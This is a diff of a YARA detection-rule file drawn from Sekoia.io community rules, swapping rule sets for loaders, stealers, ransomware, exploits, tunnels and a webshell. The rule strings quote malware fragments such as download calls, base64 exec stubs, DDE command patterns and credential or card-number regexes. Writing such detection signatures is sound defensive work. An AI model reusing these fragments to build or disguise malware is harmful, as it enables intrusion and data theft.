 		tags = "FILE"
@@ -241504,75 +242312,53 @@ rule SEKOIA_Clipper_Win_Cryptoclippy : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "C:\\mbedtls\\library\\" ascii
-		$str02 = "udp://8.8.8.8:53" ascii
-		$str03 = "Upgrade: websocket" ascii
-		$str04 = "%s\\%s.lnk" ascii
-		$str05 = "%s\\%s.ps1" ascii
-		$str06 = "%s\\%s.bat" ascii
-		$str07 = "set PSExecutionPolicyPreference=Unrestricted" ascii
-		$str08 = "schtasks /delete /tn \"%ls\" /f" ascii
-		$str09 = "SetClipboardData" ascii
-		$str10 = "SetWinEventHook" ascii
+		$s1 = ".CRT" ascii
+		$s2 = ".tls" ascii
+		$s3 = "github.com/Ne0nd0g/merlin" ascii
+		$s4 = "github.com/refraction-networking" ascii
+		$s5 = "SendMerlinMessage" ascii
+		$s6 = "ifconfigH9" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 8 of them
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and all of them and filesize > 5MB and filesize < 15MB
 }
-rule SEKOIA_Loader_Latrodectus_Dll : FILE
+rule SEKOIA_Gen_Empire_Onedrive_Stager
 {
 	meta:
-		description = "Finds Latrodectus samples based on the specific strings"
+		description = "Detects the Empire OneDrive stager"
 		author = "Sekoia.io"
-		id = "c60676ad-31cb-4f4d-9073-757a0ad7d23d"
-		date = "2023-12-08"
+		id = "2053416f-1f53-491e-9c70-787a04362d16"
+		date = "2022-01-26"
 		modified = "2024-12-19"
-		reference = "https://twitter.com/Myrtus0x0/status/1732997981866209550"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_latrodectus_dll.yar#L1-L35"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "57aae1944eded14537cdc1c17b21cfc503687a416551b782fc76f8c7858e936e"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/gen_empire_onedrive_stager.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "90b3548cd3f4f7f936da70ec95dbe0ff3c1421d40a6e8557952d28d358b7c1f1"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 76
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "c:\\temp\\debug.pdb" fullword ascii
-		$str02 = "Bottmp64.dll" fullword ascii
-		$str03 = "scab" fullword ascii
-		$str04 = "&wmic=" fullword ascii
-		$str05 = "&ipconfig=" fullword ascii
-		$str06 = "&systeminfo=" fullword ascii
-		$str07 = "&domain_trusts=" fullword ascii
-		$str08 = "&domain_trusts_all=" fullword ascii
-		$str09 = "&net_view_all_domain=" fullword ascii
-		$str10 = "&net_view_all=" fullword ascii
-		$str11 = "&net_group=" fullword ascii
-		$str12 = "&net_config_ws=" fullword ascii
-		$str13 = "&net_wmic_av=" fullword ascii
-		$str14 = "&whoami_group=" fullword ascii
-		$str15 = "\"subproc\": [" fullword ascii
-		$str16 = "&proclist=[" fullword ascii
-		$str17 = "&desklinks=[" fullword ascii
-		$str18 = "Update_%x" fullword wide
-		$str19 = "Custom_update" fullword wide
-		$str20 = "\\update_data.dat" fullword wide
+		$sleep = "Start-Sleep -Seconds $(($PI -as [Int])*2)" wide ascii nocase
+		$down = "wc.DownloadData" wide ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of them
+		$down in ( @sleep .. @sleep + 1000 )
 }
-rule SEKOIA_Hacktool_Win_Processhacker : FILE
+rule SEKOIA_Tool_Gost_Tunnel_Strings : FILE
 {
 	meta:
-		description = "Detect ProcessHacker hacktool"
+		description = "Detects GOST Go Tunnel, based on strings"
 		author = "Sekoia.io"
-		id = "1dffe8c9-2ab7-4265-965e-8673b80f17d5"
-		date = "2022-09-09"
+		id = "2de7aae9-9cf8-4007-aa27-5caea4123713"
+		date = "2023-02-28"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_win_processhacker.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "cfcfaa7f3afc8b82ce0188d9ead63746a7effd40acb6ad504f8d70a45d8476d5"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_gost_tunnel_strings.yar#L1-L35"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "eba1557acc1d9f16817a4bcd24631334a12357e45ad23f1c333de686f20f9291"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241580,150 +242366,139 @@ rule SEKOIA_Hacktool_Win_Processhacker : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "Unable to uninstall KProcessHacker" wide
-		$str1 = "Process Hacker's settings file is corrupt. Do you want to reset it?" wide
-		$str2 = "Process Hacker uses the following components:" wide
+		$ = ".(*shadowUDPHandler).transportUDP" ascii
+		$ = ".(*quicCipherConn).decrypt" ascii
+		$ = ".(*socks4aConnector).ConnectContext.func1" ascii
+		$ = ".(*mtlsTransporter).Handshake" ascii
+		$ = ".(*FIFOStrategy).Apply" ascii
+		$ = ".dnsTCPExchanger" ascii
+		$ = ".dohResponseWriter" ascii
+		$ = ".tcpRemoteForwardListener" ascii
+		$ = ".shadowUDPPacketConn" ascii
+		$ = ".sshTunnelListener" ascii
+		$ = "/listener/rtcp/listener.go" ascii
+		$ = "/handler/unix/handler.go" ascii
+		$ = "/handler/tunnel/tunnel.go" ascii
+		$ = "/internal/net/proxyproto/listener.go" ascii
+		$ = "/internal/util/serial/conn.go" ascii
+		$ = "github.com/go-gost/x" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xcefaedfe or uint32be( 0 ) == 0xcffaedfe or uint32be( 0 ) == 0xbebafeca ) and 5 of them
 }
-rule SEKOIA_Backdoor_Powershellempire_Python : FILE
+rule SEKOIA_Crime_Sload_Scheduledtask_Dropper_Strings
 {
 	meta:
-		description = "Detects Empire Python version"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "c2913f60-46a2-42c1-8569-72568eaddaed"
-		date = "2022-04-15"
+		id = "01c51da8-71a5-449f-a609-933c37bc2e63"
+		date = "2022-08-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_powershellempire_python.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "81c74a73ff7fe02420f29a53b350f1b53964f5a04f0694fed5b1b4bd6cc5ad03"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/crime_sload_scheduledtask_dropper_strings.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "3a48009933d1de47314ec15c262375636574a7565016eab3792106fa2c0ba79f"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 78
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "import sys,base64;exec"
-		$ = "aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2"
+		$ = "$hh='hi'+'dd'+'en';"
+		$ = { 7D 65 6C 73 65 7B 0A 24 72 73 3D 30 3B 0A 7D 0A }
+		$ = { 6B 69 6C 6C 20 2D 6E 61 6D 65 20 2A 77 65 72 73 68 65 6C 2A }
 
 	condition:
-		all of them and filesize < 1MB
+		all of them
 }
-rule SEKOIA_Hacktool_Win_Cookiekatz : FILE
+rule SEKOIA_Exploit_Cve20191458_Strings : CVE_2019_1458 FILE
 {
 	meta:
-		description = "Finds ChromeKatz (CookieKatz version) standalone samples based on the strings"
+		description = "Detects compiled exploit for CVE-2019-1458 (Generic)"
 		author = "Sekoia.io"
-		id = "a32769bb-4ec4-46c7-9402-21afdf8d4293"
-		date = "2024-10-30"
+		id = "0be4a550-0f0a-4596-ab32-aafaececf919"
+		date = "2022-08-29"
 		modified = "2024-12-19"
-		reference = "https://github.com/Meckazin/ChromeKatz"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_win_cookiekatz.yar#L1-L36"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "fef9fc33a788489af44b2f732c450d4ef018fbaced7f5471230b282dfd6f1169"
-		logic_hash = "a030f551d0f3dedf0f19e22b415aa87dd1c43ab2242db8b5cad14ae6b7695b3a"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/exploit_cve20191458_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8e22a79b3d7dc45d63062c71909faee61584c71b6ea7353ba0f40c00745a2075"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = "CVE-2019-1458, FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "CookieKatz.exe" ascii
-		$str02 = "--utility-sub-type=network.mojom.NetworkService" wide
-		$str03 = "chrome.dll" wide
-		$str04 = "msedge.dll" wide
-		$str05 = "msedgewebview2.exe" wide
-		$str06 = "Failed to read cookie struct" wide
-		$str07 = "Failed to read the root node from given address" wide
-		$str08 = "Error reading left node" wide
-		$str09 = "By Meckazin" ascii
-		$str10 = "By default targets first available Chrome process" ascii
-		$str11 = "Kittens love cookies too!" ascii
-		$str12 = "Attempting to read the cookie value from address: 0x%p" ascii
-		$str13 = "szCookieMonster" ascii
-		$str14 = "[*] Targeting Chrome" ascii
-		$str15 = "[*] Targeting Edge" ascii
-		$str16 = "[*] This Cookie map was empty" ascii
-		$str17 = "[+] Found browser process: %d" ascii wide
-		$str18 = "[*] Targeting process PID: %d" wide
-		$str19 = "[*] Found CookieMonster on 0x%p" wide
-		$str20 = "[*] CookieMap should be found in address 0x%p" wide
+		$ = "[-] Failed to create SploitWnd window"
+		$ = "[+] ProcessCreated with pid %d!"
+		$ = "[!] Exploit fail, test:0x%p,tagWND:0x%p, error:0x%lx"
+		$ = "[*] tagWND: 0x%p, tagCLS:0x%p, gap:0x%llx"
+		$ = "[*] Simulating alt key press"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 8 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 3 of them
 }
-rule SEKOIA_Apt_Luckymouse_Compromised_Electronapp : FILE
+
+rule SEKOIA_Apt_Menupass_Maliciouslibvlc_Dll
 {
 	meta:
-		description = "Detects compromised ElectronApp"
+		description = "Detects the malicious LibVLC variants used by MenuPass"
 		author = "Sekoia.io"
-		id = "7702217d-771f-47af-8eaa-d5acf1e14f4d"
-		date = "2022-08-05"
+		id = "8b6b56f3-33b5-41cf-8bcb-e653c98718bd"
+		date = "2022-04-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_luckymouse_compromised_electronapp.yar#L1-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "939546b75d5f7161bb8eb1fd838a9a7c0c88cb58a0f01f67e687523e5b31b0aa"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_menupass_maliciouslibvlc_dll.yar#L3-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "de56e112a477d3a77146f1b84c8aa3e66a382a87f1492dd50aa1de9458b33717"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$s = "module.exports=function(t){eval(function(p,a,c,k,e,r)"
-
 	condition:
-		$s at 0 and filesize < 100KB
+		pe.DLL and pe.number_of_exports < 15 and for all i in ( 0 .. pe.number_of_exports - 1 ) : ( pe.export_details [ i ] . name contains "libvlc_" )
 }
-rule SEKOIA_Tool_Win_Lightrail : FILE
+rule SEKOIA_Apt_Gobrat_2 : FILE
 {
 	meta:
-		description = "Detect the LIGHTRAIL tunneler used by UNC1549"
+		description = "Detects GobRat related files"
 		author = "Sekoia.io"
-		id = "39259f2c-11fe-4edd-8a9e-f36920132272"
-		date = "2024-02-29"
+		id = "6b7e38f5-00bc-49c8-b34d-3e878bf426d8"
+		date = "2024-09-10"
 		modified = "2024-12-19"
-		reference = "https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_win_lightrail.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "84491bf7e955930c04e96f63ffb8c8f35ad02d9a917eceb727bf87c9ed3d831e"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_gobrat_2.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9f2fdbe2cc39c91b2ac8904fb29a0142bf770859d17590017920203641860a13"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "e7ddab967b0487827db069833221aa2fe4ca05f7cda976cbc528ecb306a22774"
-		hash2 = "4ecd511d9654f7fd66a61eb4ab6d7153040b5092d1594ff39935f01fbdbd4914"
-		hash3 = "3472bc8ed6182eb17811c97ada7ebd48034ad09b6a7062b341fe09818d7a309f"
-		hash4 = "ec7b97092278123f0c0613c5f9252eeccf55265d4aa5f2cfed57a63ebf3530ac"
-		hash5 = "8f3757b8f5888a1303af71cbc1a106927d3d6c45552ee192c3ed0347804c2194"
-		hash6 = "8b47b5ed1ed7afcc9194e1350d4e1996bd91ca3204747b586f309f4609a1a4cc"
 
 	strings:
-		$s1 = "lastenzug.dll"
-		$s2 = "Lastenzug.dll"
-		$azure = ".cloudapp.azure.com" wide
+		$ = "thisisweird" ascii
+		$ = "ZzZzZzZzZzZz"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 1 of ( $s* ) and $azure
+		all of them and uint32be( 0 ) == 0x7f454c46
 }
-rule SEKOIA_Apt_Konni_Dropper : FILE
+rule SEKOIA_Launcher_Win_Stealthmutant_Bat_Launcher : FILE
 {
 	meta:
-		description = "Detects Konni dropper used when distributed via malicious document"
+		description = "StealthMutant/StealthVector bat launcher"
 		author = "Sekoia.io"
-		id = "0783a55e-1d1e-40ca-a661-2c5dec6d78d6"
-		date = "2023-11-27"
+		id = "7452291f-2244-469e-bb7c-5eff1ca17aa2"
+		date = "2021-08-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_konni_dropper.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6d1b1f5ccbdc20908891e5f40ceb85c251b1ca2a395fa4b106e63718c6393a22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/launcher_win_stealthmutant_bat_launcher.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "06ae4bc3ed938738dfca10c182a6a2363aa6aa70e730aefd41f6fe73c675785d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241731,92 +242506,83 @@ rule SEKOIA_Apt_Konni_Dropper : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "UnzipAFile"
-		$ = "check.bat"
-		$ = "FOF_SILENT"
-		$ = "fLieObj"
+		$s1 = "set \"WORK_DIR=" ascii
+		$s2 = "set \"DLL_NAME=" ascii
+		$s3 = "set \"SERVICE_NAME=" ascii
+		$s4 = "set \"DISPLAY_NAME=" ascii
+		$s5 = "set \"DESCRIPTION=" ascii
+		$start = "@echo off" ascii
+		$end = "net start \"%SERVICE_NAME%\"" ascii
 
 	condition:
-		filesize < 1MB and 3 of them
+		uint16( 0 ) != 0x5A4D and all of ( $s* ) and filesize < 2KB and $start at 0 and $end in ( filesize -30 .. filesize )
 }
-rule SEKOIA_Infostealer_Win_Enigma_Stealer_Module : FILE
+rule SEKOIA_Trojan_Android_Xenomorph : FILE
 {
 	meta:
-		description = "Find stealer module of Enigma Stealer based on specific strings"
+		description = "Detect samples of the Android banking trojan Xenomorph"
 		author = "Sekoia.io"
-		id = "664fe8de-b406-4d63-9a4b-1c350b444f02"
-		date = "2023-01-30"
+		id = "ec65ca1b-e71f-4772-8be0-2a2b6a690987"
+		date = "2022-02-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_enigma_stealer_module.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "4d2fb518c9e23c5c70e70095ba3b63580cafc4b03f7e6dce2931c54895f13b2c"
-		logic_hash = "0a6615d65867a160e1c87fbcfe30090d44d7f5c25b3a904f8719be7b385b14bb"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/trojan_android_xenomorph.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d44e5742449cd9c19b50ab23f452378d5627e19140554d12086994d820df9c64"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$eni01 = "enigma.common" nocase ascii wide
-		$eni02 = "--ENIGMA STEALER--" wide
-		$str01 = "SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')" wide
-		$str02 = "/C chcp 65001 && netsh wlan show profile | findstr All" wide
-		$str03 = "/C chcp 65001 && netsh wlan show networks mode=bssid" wide
-		$str04 = "[Open google maps]" wide
-		$str05 = "Stealerium.Target." ascii
-		$str06 = "--- ClipperBCH ---" wide
-		$str07 = "//setting[@name='Username']/value" wide
-		$str08 = "Stealer >> Failed recursive remove directory with passwords" wide
-		$str09 = "[a-zA-Z0-9]{24}\\.[a-zA-Z0-9]{6}\\.[a-zA-Z0-9_\\-]{27}|mfa\\.[a-zA-Z0-9_\\-]{84}" wide
-		$str10 = "^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$" wide
+		$ass0 = "assets/shadows/knife_shadow_"
+		$ass1 = "assets/knife_"
+		$ass2 = "okhttp3"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of ( $eni* ) and 4 of ( $str* )
+		uint32be( 0 ) == 0x504B0304 and filesize > 1MB and filesize < 4MB and #ass0 > 10 and #ass1 > 10 and $ass2
 }
-rule SEKOIA_Ransomware_Win_Avoslocker : FILE
+rule SEKOIA_Trojan_Win_Bbtok_Lnk_Sep23 : FILE
 {
 	meta:
-		description = "Detect AvosLocker ransomware (2021-07)"
+		description = "Finds BBTok installation LNK file"
 		author = "Sekoia.io"
-		id = "fc5c2483-48cb-4282-b6cb-ac728b948607"
-		date = "2021-08-03"
+		id = "b1d5dae6-d92f-4a4a-ae90-528cdb3e9e4c"
+		date = "2023-09-26"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_avoslocker.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d7f14f78ac569011ecf964109c72d75de4942361033a544350a2f73c7af64a0c"
+		reference = "https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/trojan_win_bbtok_lnk_sep23.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "32bf07e3740399105359b62d8a612dfa731b024e06c9104b71b496919b5efe9e"
+		logic_hash = "5783487585dde1314c485bdcf3942b7e8b572c0689522ea136240833d2a64f5b"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash6 = "f810deb1ba171cea5b595c6d3f816127fb182833f7a08a98de93226d4f6a336f"
-		hash7 = "c0a42741eef72991d9d0ee8b6c0531fc19151457a8b59bdcf7b6373d1fe56e02"
-		hash8 = "84d94c032543e8797a514323b0b8fd8bd69b4183f17351628b13d1464093af2d"
 
 	strings:
-		$s1 = "cryptopp850\\rijndael_simd.cpp" ascii
-		$s2 = "cryptopp850\\sha_simd.cpp" ascii
-		$s3 = "cryptopp850\\gf2n_simd.cpp" ascii
-		$s4 = "cryptopp850\\sse_simd.cpp" ascii
+		$lnk = {4C 00 00 00}
+		$str01 = "%ProgramFiles(x86)%\\Microsoft\\Edge\\Application\\msedge.exe" ascii wide
+		$str02 = ".pdf /Y & start" wide
+		$str03 = "\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe -nologo" wide
 
 	condition:
-		all of them and uint16( 0 ) == 0x5A4D and filesize > 900KB and filesize < 950KB
+		all of them and filesize < 10KB
 }
-rule SEKOIA_Apt_Badmagic_Startrevsocks_Pshscript : FILE
+rule SEKOIA_Infostealer_Win_Titan : FILE
 {
 	meta:
-		description = "Detects BadMagic DLL Loader powershell script"
+		description = "Finds samples of the Titan Stealer"
 		author = "Sekoia.io"
-		id = "a6c96aee-9e78-47d2-afe3-f3c5246a9370"
-		date = "2023-05-15"
+		id = "0adbe616-0d91-4b05-b7a8-812cd79f9252"
+		date = "2023-01-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_badmagic_startrevsocks_pshscript.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6a4615afb836330634cde9559dacfff50daef44a370f6191c6771a2066074a31"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_titan.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "996dc320c83f57c47afe50ad032bac43ad1fbfbbd5a86e517089a062b0382993"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -241824,81 +242590,87 @@ rule SEKOIA_Apt_Badmagic_Startrevsocks_Pshscript : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$ExecutablePath"
-		$ = "Start-Sleep -Second 2"
-		$ = "recn -15 -rect 15"
+		$str0 = "/sendlog" ascii
+		$str1 = "/stealer/grabfiles.go" ascii
+		$str2 = "/stealer/installedsoft.go" ascii
+		$str3 = "/stealer/screenshot.go" ascii
+		$str4 = "/stealer/sendlog.go" ascii
+		$str5 = "/stealer/userinformation.go" ascii
+		$str6 = "C:/Program Files (x86)/Steam/config/" ascii
+		$str7 = "/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldb/" ascii
+		$str8 = "MAC Adresses:" ascii
+		$str9 = "/Coowon/Coowon/" ascii
+		$str10 = "_/C_/Users/admin/Desktop/stealer_v7/stealer" ascii
 
 	condition:
-		all of them and filesize < 1KB
+		uint16( 0 ) == 0x5A4D and 5 of them
 }
-rule SEKOIA_Apt_Apt28_Wayzgoose_Exploit_String : FILE
+
+rule SEKOIA_Downloader_Win_Fake_Tor_Browser
 {
 	meta:
-		description = "Detects APT28's Wayzgoose exploit strings"
+		description = "Detect fake TOR browser used to spy Chinese TOR users"
 		author = "Sekoia.io"
-		id = "23d9e09e-202c-47f5-abf7-6b5085e44400"
-		date = "2024-04-29"
+		id = "6b070ba6-490b-43c2-9a01-65812d829eeb"
+		date = "2022-10-05"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt28_wayzgoose_exploit_string.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "804de275f7e8c43fe5690c0bd9338b134c0c47f845f1c3b3a747c3765815084c"
+		reference = "https://securelist.com/onionpoison-infected-tor-browser-installer-youtube/107627/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/downloader_win_fake_tor_browser.yar#L4-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5fe60673e54a6904f4fd068b04b950b895b18e7766d2e7343eae2b1bba9591f9"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$ = "wayzgoose.dll"
-		$ = "wayzgoose_get_version"
-		$ = "NtSetInformationFile"
-		$ = "ZwDuplicateObject"
-		$ = "ZwClose"
-
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 500KB
+		for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "7172f95f934574be95c0250fb42b8f51" )
 }
-rule SEKOIA_Technique_Csv_Dde_Exec_Regex : FILE
+rule SEKOIA_Tool_Pivotnacci_Webshell : FILE
 {
 	meta:
-		description = "Find .csv file exploiting DDE technique"
+		description = "Detects pivotnacci webshell"
 		author = "Sekoia.io"
-		id = "71d0e987-51ab-49bc-9d0d-d2f9006af1de"
-		date = "2022-02-02"
+		id = "729b6381-b59d-46fe-9ad4-b8b68fb0ceea"
+		date = "2024-04-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/technique_csv_dde_exec_regex.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "fd4c64ad094b8ed543cc6990f2e4f341bb38ba0b4d335347e5676475da94dc06"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_pivotnacci_webshell.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a57792915b4c888547ebe0b08b928e4bc32b3526c98a3ccc9fca0193cedee20a"
 		score = 75
-		quality = 28
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$cmd0 = /=\s*wmic\|/ nocase
-		$cmd1 = /=\s*cmd\|/ nocase
-		$cmd2 = /=\s*wscript\|/ nocase
-		$cmd3 = /=\s*cscript\|/ nocase
-		$cmd4 = /=\s*powershell\|/ nocase
+		$ = "if (cmd == SEND_OPERATION) {"
+		$ = "Response.BinaryWrite(newBuff)"
+		$ = "Request.Headers.Get(ID_HEADER)"
+		$ = "[$READ_BUFFER_SESSION_KEY . $connection_id]"
